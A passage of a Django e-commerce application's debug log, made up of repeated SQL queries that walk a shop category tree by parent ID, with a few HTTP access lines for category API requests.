"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:04:39,607 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:04:39,611 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:04:39,613 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:04:39,615 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:04:39,619 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:04:39,621 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:04:39,623 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:04:39,625 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:04:39,627 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:04:39,631 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:04:39,633 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:04:39,635 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:04:39,637 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:04:39,639 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:04:39,643 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:04:39,645 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:04:39,647 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:04:39,649 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:04:39,652 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:04:39,654 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:04:39,657 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:04:39,660 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:04:39,662 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:04:39,664 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:04:39,667 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:04:39,670 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:04:39,672 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:04:39,674 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:04:39,677 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:04:39,679 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:04:39,683 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:04:39,685 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:04:39,687 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:04:39,689 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:04:39,691 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:04:39,693 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:04:39,696 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:04:39,698 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:04:39,701 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:04:39,703 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:04:39,705 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:04:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 07:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 07:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 07:13:49,355 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:13:49,365 utils 4252 140031732287232 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-20 07:13:49,371 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:13:49,377 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:13:49,378 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:13:49,384 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 07:13:49] "GET /api/v1/categories/15 HTTP/1.0" 200 223 DEBUG 2019-12-20 07:13:49,392 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:13:49,397 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:13:49,401 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:13:49,405 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:13:49,409 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:13:49,414 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:13:49,418 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:13:49,422 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:13:49,426 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:13:49,430 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:13:49,436 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:13:49,439 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:13:49,443 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:13:49,447 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:13:49,451 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:13:49,458 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:13:49,460 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:13:49,462 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:13:49,464 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:13:49,466 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 